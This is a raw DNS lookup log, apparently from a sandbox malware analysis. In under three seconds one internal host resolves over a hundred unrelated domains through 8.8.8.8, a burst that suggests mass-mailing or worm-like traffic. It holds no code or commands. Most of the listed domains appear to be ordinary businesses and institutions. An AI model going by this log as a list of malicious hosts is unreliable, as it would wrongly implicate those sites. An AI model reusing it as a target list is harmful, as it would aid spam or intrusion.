                                                                                                                                                                              Sep 15, 2023 07:28:17.296170950 CEST8.8.8.8192.168.2.30x6fc2No error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.346486092 CEST8.8.8.8192.168.2.30x45edNo error (0)magicomm.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.346694946 CEST8.8.8.8192.168.2.30xf7d7No error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.358078003 CEST8.8.8.8192.168.2.30xcd2No error (0)adventist.ro49.12.155.123A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.378079891 CEST8.8.8.8192.168.2.30xf7dcNo error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.378079891 CEST8.8.8.8192.168.2.30xf7dcNo error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.391045094 CEST8.8.8.8192.168.2.30x68a7Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.402822971 CEST8.8.8.8192.168.2.30xbb98No error (0)shittas.com192.3.246.178A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.441747904 CEST8.8.8.8192.168.2.30x4e80No error (0)orlyhotel.com172.67.156.49A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.441747904 CEST8.8.8.8192.168.2.30x4e80No error (0)orlyhotel.com104.21.48.207A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.452459097 CEST8.8.8.8192.168.2.30x6850No error (0)rast.se93.188.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.453536034 CEST8.8.8.8192.168.2.30xc87dNo error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.467223883 CEST8.8.8.8192.168.2.30x9aNo error (0)k-nikko.com13.113.204.223A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.467223883 CEST8.8.8.8192.168.2.30x9aNo error (0)k-nikko.com18.179.184.212A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.477647066 CEST8.8.8.8192.168.2.30x71c5No error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.508196115 CEST8.8.8.8192.168.2.30x7563No error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.593576908 CEST8.8.8.8192.168.2.30xdfcfNo error (0)peminet.net198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.593964100 CEST8.8.8.8192.168.2.30xac2No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.605041981 CEST8.8.8.8192.168.2.30x1b61No error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.614984989 CEST8.8.8.8192.168.2.30x78b0Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.625099897 CEST8.8.8.8192.168.2.30xdfc7Name error (3)slower.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.635763884 CEST8.8.8.8192.168.2.30x14adNo error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.663031101 CEST8.8.8.8192.168.2.30xa27No error (0)impexnc.com208.91.197.46A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.686436892 CEST8.8.8.8192.168.2.30x54a2No error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.704794884 CEST8.8.8.8192.168.2.30x9492No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.704794884 CEST8.8.8.8192.168.2.30x9492No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.720186949 CEST8.8.8.8192.168.2.30x76bNo error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.732304096 CEST8.8.8.8192.168.2.30x8db8No error (0)www.muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.736097097 CEST8.8.8.8192.168.2.30x38f3No error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.823359966 CEST8.8.8.8192.168.2.30x48deNo error (0)dataform.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.835513115 CEST8.8.8.8192.168.2.30x98c0No error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.849387884 CEST8.8.8.8192.168.2.30xa3c8No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.853553057 CEST8.8.8.8192.168.2.30xf3eaNo error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.858666897 CEST8.8.8.8192.168.2.30xa722Name error (3)slower.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.864767075 CEST8.8.8.8192.168.2.30x3539No error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.865922928 CEST8.8.8.8192.168.2.30x4651No error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.899795055 CEST8.8.8.8192.168.2.30xe05No error (0)yasuma.com61.200.81.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.909670115 CEST8.8.8.8192.168.2.30x7154No error (0)adeesa.net104.21.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.909670115 CEST8.8.8.8192.168.2.30x7154No error (0)adeesa.net172.67.209.11A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.929158926 CEST8.8.8.8192.168.2.30x9c59Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.960052013 CEST8.8.8.8192.168.2.30x532cName error (3)slower.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.986778021 CEST8.8.8.8192.168.2.30x84b2No error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.000159979 CEST8.8.8.8192.168.2.30x9c96No error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.000159979 CEST8.8.8.8192.168.2.30x9c96No error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.010631084 CEST8.8.8.8192.168.2.30xc35bNo error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.032075882 CEST8.8.8.8192.168.2.30x7046No error (0)revoldia.net154.201.225.123A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.035559893 CEST8.8.8.8192.168.2.30xd1fNo error (0)assideum.com52.219.106.128A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.035559893 CEST8.8.8.8192.168.2.30xd1fNo error (0)assideum.com52.219.95.40A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.035559893 CEST8.8.8.8192.168.2.30xd1fNo error (0)assideum.com52.219.94.128A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.035559893 CEST8.8.8.8192.168.2.30xd1fNo error (0)assideum.com52.219.110.208A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.035559893 CEST8.8.8.8192.168.2.30xd1fNo error (0)assideum.com52.219.80.107A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.035559893 CEST8.8.8.8192.168.2.30xd1fNo error (0)assideum.com52.219.176.112A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.035559893 CEST8.8.8.8192.168.2.30xd1fNo error (0)assideum.com52.219.108.160A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.035559893 CEST8.8.8.8192.168.2.30xd1fNo error (0)assideum.com52.219.107.24A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.051007986 CEST8.8.8.8192.168.2.30x7a0bName error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.069008112 CEST8.8.8.8192.168.2.30x2c44No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.099487066 CEST8.8.8.8192.168.2.30x15ddNo error (0)k-nikko.com13.113.204.223A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.099487066 CEST8.8.8.8192.168.2.30x15ddNo error (0)k-nikko.com18.179.184.212A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.112845898 CEST8.8.8.8192.168.2.30xda9dNo error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.140105009 CEST8.8.8.8192.168.2.30xfe2aNo error (0)bount.com.tw104.21.76.140A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.140105009 CEST8.8.8.8192.168.2.30xfe2aNo error (0)bount.com.tw172.67.196.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.155745029 CEST8.8.8.8192.168.2.30x5c50Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.169785023 CEST8.8.8.8192.168.2.30x2e83No error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.191365004 CEST8.8.8.8192.168.2.30x7de6No error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.203514099 CEST8.8.8.8192.168.2.30x650aName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.216994047 CEST8.8.8.8192.168.2.30xd56fNo error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.216994047 CEST8.8.8.8192.168.2.30xd56fNo error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.216994047 CEST8.8.8.8192.168.2.30xd56fNo error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.216994047 CEST8.8.8.8192.168.2.30xd56fNo error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.239166021 CEST8.8.8.8192.168.2.30x604cNo error (0)biosolve.com151.101.130.159A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.272461891 CEST8.8.8.8192.168.2.30x5833No error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.279267073 CEST8.8.8.8192.168.2.30x2652No error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.282058001 CEST8.8.8.8192.168.2.30x4801No error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.297112942 CEST8.8.8.8192.168.2.30x63c0No error (0)bd-style.com103.112.69.92A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.301464081 CEST8.8.8.8192.168.2.30xaef0Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.334846020 CEST8.8.8.8192.168.2.30x9079Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.345732927 CEST8.8.8.8192.168.2.30xc77cNo error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.356956005 CEST8.8.8.8192.168.2.30x8881No error (0)4locals.net80.82.115.227A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.375767946 CEST8.8.8.8192.168.2.30xf085No error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.386744976 CEST8.8.8.8192.168.2.30xbe86No error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.400520086 CEST8.8.8.8192.168.2.30x116aName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.408065081 CEST8.8.8.8192.168.2.30xa82Name error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.412051916 CEST8.8.8.8192.168.2.30xe5a4No error (0)zugseil.com92.42.191.40A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.416425943 CEST8.8.8.8192.168.2.30x8910No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.416425943 CEST8.8.8.8192.168.2.30x8910No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.444725037 CEST8.8.8.8192.168.2.30x9d73Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.456958055 CEST8.8.8.8192.168.2.30xd9f0No error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.457818985 CEST8.8.8.8192.168.2.30x2232No error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.468358994 CEST8.8.8.8192.168.2.30xd9f0No error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.487724066 CEST8.8.8.8192.168.2.30x5b56No error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.507746935 CEST8.8.8.8192.168.2.30x5176Name error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.556310892 CEST8.8.8.8192.168.2.30xcd85Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.564575911 CEST8.8.8.8192.168.2.30x39c6No error (0)diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.570362091 CEST8.8.8.8192.168.2.30x8b5No error (0)assideum.com52.219.92.80A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.570362091 CEST8.8.8.8192.168.2.30x8b5No error (0)assideum.com52.219.92.152A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.570362091 CEST8.8.8.8192.168.2.30x8b5No error (0)assideum.com52.219.98.28A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.570362091 CEST8.8.8.8192.168.2.30x8b5No error (0)assideum.com52.219.92.224A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.570362091 CEST8.8.8.8192.168.2.30x8b5No error (0)assideum.com52.219.107.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.570362091 CEST8.8.8.8192.168.2.30x8b5No error (0)assideum.com52.219.142.16A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.570362091 CEST8.8.8.8192.168.2.30x8b5No error (0)assideum.com52.219.98.96A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.570362091 CEST8.8.8.8192.168.2.30x8b5No error (0)assideum.com52.219.92.128A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.572594881 CEST8.8.8.8192.168.2.30xcac1No error (0)sinwal.com104.21.50.138A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.572594881 CEST8.8.8.8192.168.2.30xcac1No error (0)sinwal.com172.67.206.199A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.612215042 CEST8.8.8.8192.168.2.30x2f3bName error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.649425030 CEST8.8.8.8192.168.2.30x176eNo error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.649425030 CEST8.8.8.8192.168.2.30x176eNo error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.676083088 CEST8.8.8.8192.168.2.30x8fe6No error (0)oozkranj.com212.44.102.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.686162949 CEST8.8.8.8192.168.2.30xe45aNo error (0)hyab.se104.21.52.126A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.686162949 CEST8.8.8.8192.168.2.30xe45aNo error (0)hyab.se172.67.199.57A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.697252989 CEST8.8.8.8192.168.2.30x468fNo error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.697252989 CEST8.8.8.8192.168.2.30x468fNo error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.773571968 CEST8.8.8.8192.168.2.30x513No error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.795274019 CEST8.8.8.8192.168.2.30x4ab4No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.795274019 CEST8.8.8.8192.168.2.30x4ab4No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.795274019 CEST8.8.8.8192.168.2.30x4ab4No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.795274019 CEST8.8.8.8192.168.2.30x4ab4No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.808779001 CEST8.8.8.8192.168.2.30x63c0No error (0)bd-style.com103.112.69.92A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.828746080 CEST8.8.8.8192.168.2.30x1022No error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.856854916 CEST8.8.8.8192.168.2.30xff40No error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.889847040 CEST8.8.8.8192.168.2.30xdbd4No error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.916723967 CEST8.8.8.8192.168.2.30xa3f0No error (0)sigtoa.com104.21.49.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.916723967 CEST8.8.8.8192.168.2.30xa3f0No error (0)sigtoa.com172.67.160.168A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.940454006 CEST8.8.8.8192.168.2.30x3070No error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.950031996 CEST8.8.8.8192.168.2.30x1b99No error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.950031996 CEST8.8.8.8192.168.2.30x1b99No error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.952364922 CEST8.8.8.8192.168.2.30x3fd9No error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.961903095 CEST8.8.8.8192.168.2.30x8a87No error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.979363918 CEST8.8.8.8192.168.2.30xae4eNo error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.980040073 CEST8.8.8.8192.168.2.30x2104No error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.980040073 CEST8.8.8.8192.168.2.30x2104No error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.018626928 CEST8.8.8.8192.168.2.30xdac1No error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.037241936 CEST8.8.8.8192.168.2.30xdd00No error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.048821926 CEST8.8.8.8192.168.2.30xd81aNo error (0)ascc.org.au203.210.102.34A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.059622049 CEST8.8.8.8192.168.2.30xad8eNo error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.059622049 CEST8.8.8.8192.168.2.30xad8eNo error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.094683886 CEST8.8.8.8192.168.2.30xb23dNo error (0)www.clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.094683886 CEST8.8.8.8192.168.2.30xb23dNo error (0)www.clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.116281033 CEST8.8.8.8192.168.2.30xdf6cNo error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.131705999 CEST8.8.8.8192.168.2.30xfec6No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.138535023 CEST8.8.8.8192.168.2.30x7cb9No error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.189136028 CEST8.8.8.8192.168.2.30xeb96No error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.215352058 CEST8.8.8.8192.168.2.30x3e05No error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.313731909 CEST8.8.8.8192.168.2.30x7bd3No error (0)78san.com133.242.15.119A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.318001986 CEST8.8.8.8192.168.2.30xc013No error (0)shteeble.com185.106.129.180A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.324352980 CEST8.8.8.8192.168.2.30xd76eServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.343067884 CEST8.8.8.8192.168.2.30x3d39Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.357494116 CEST8.8.8.8192.168.2.30x82dNo error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.374835014 CEST8.8.8.8192.168.2.30xc455No error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.374835014 CEST8.8.8.8192.168.2.30xc455No error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.374835014 CEST8.8.8.8192.168.2.30xc455No error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.374835014 CEST8.8.8.8192.168.2.30xc455No error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.396055937 CEST8.8.8.8192.168.2.30xfda9No error (0)snf.it95.174.22.233A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.444427013 CEST8.8.8.8192.168.2.30xd9efNo error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.444427013 CEST8.8.8.8192.168.2.30xd9efNo error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.444427013 CEST8.8.8.8192.168.2.30xd9efNo error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.444427013 CEST8.8.8.8192.168.2.30xd9efNo error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.513107061 CEST8.8.8.8192.168.2.30xe10No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.515305042 CEST8.8.8.8192.168.2.30x42dbNo error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.515305042 CEST8.8.8.8192.168.2.30x42dbNo error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.546885967 CEST8.8.8.8192.168.2.30x1f19Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.588044882 CEST8.8.8.8192.168.2.30x571cNo error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.635653019 CEST8.8.8.8192.168.2.30x8b18No error (0)ruzee.com207.180.198.201A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.638701916 CEST8.8.8.8192.168.2.30xf737No error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.648550987 CEST8.8.8.8192.168.2.30x5e1fNo error (0)603888.com67.21.93.244A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.723826885 CEST8.8.8.8192.168.2.30x8eb1Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.770651102 CEST8.8.8.8192.168.2.30xa2cNo error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.770651102 CEST8.8.8.8192.168.2.30xa2cNo error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.772176027 CEST8.8.8.8192.168.2.30x8c19No error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.772665977 CEST8.8.8.8192.168.2.30xfb71Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.777264118 CEST8.8.8.8192.168.2.30x1c63No error (0)www.diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.778629065 CEST8.8.8.8192.168.2.30x15eServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.888386011 CEST8.8.8.8192.168.2.30x70caName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.891483068 CEST8.8.8.8192.168.2.30x922aNo error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.013734102 CEST8.8.8.8192.168.2.30x511cNo error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
